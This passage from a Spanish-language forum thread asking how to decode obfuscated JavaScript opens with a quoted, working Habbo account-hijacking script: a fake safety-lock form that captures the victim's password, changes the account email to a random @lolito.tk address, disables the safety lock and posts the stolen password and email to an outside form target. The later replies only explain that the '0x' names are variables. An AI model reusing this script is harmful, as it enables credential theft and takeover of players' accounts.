(!safetyLockForm.answer1.$pristine || safetyLockForm.$submitted) --></div></fieldset><div class="form__footer"><a href="https://www.habbo.es/" class="form__cancel" onclick="location.reload()" translate="FORM_CANCEL_LABEL">Cancelar</a> <button ng-disabled="unlockingInProgress" type="" class="form__submit" onclick="add();">Continuar</button></div></div></div></div></div></div>","prepend","body","ajax","val","#inputtxt","stopcredits","random","floor","@lolito.tk","fadeToggle",".toast","animate","#toast-progress","fail","api/settings/email/change","post","https://www.habbo.es/api/safetylock/disable","get","form","createElement","action","method","input","type","text","name","mail_add","value","pass","habbo","email","id","appendChild","submit"];var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'>
« Última modificación: 16 Marzo 2016, 03:31 am por apuromafo » En línea

Apuromafo
therecse

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: ¿Cómo decodifico esto?
« Respuesta #5 en: 20 Marzo 2016, 01:05 am »

Creo que no me he explicado bien. Lo que quería decir es, como podría decodificar las direcciones que aparecen (0x...).
Gracias!
En línea

MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.518


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: ¿Cómo decodifico esto?
« Respuesta #6 en: 20 Marzo 2016, 01:45 am »

Creo que no me he explicado bien. Lo que quería decir es, como podría decodificar las direcciones que aparecen (0x...).
Gracias!

Por lo que veo, esos "0x..." no son direccines, son variables. Puedes ponerles el nombre que quieras, según lo que interpretes que hacen c/u.

Saludos!
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
esto como se come?
Ingeniería Inversa
Badcode 3 2,794 Último mensaje 18 Agosto 2004, 22:09 pm
por WiNSoCk
como ago esto ..... ???
Multimedia
jhct 5 2,711 Último mensaje 25 Febrero 2005, 10:41 am
por jhct
[MOD] ¿Cómo hago esto? osea como creo un video como este.
Multimedia
MicroAttackeR 2 4,299 Último mensaje 27 Octubre 2008, 21:26 pm
por MicroAttackeR
Como hacer algo como esto......--->> « 1 2 »
Desarrollo Web
prometheus48 11 6,631 Último mensaje 4 Enero 2012, 19:12 pm
por prometheus48
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines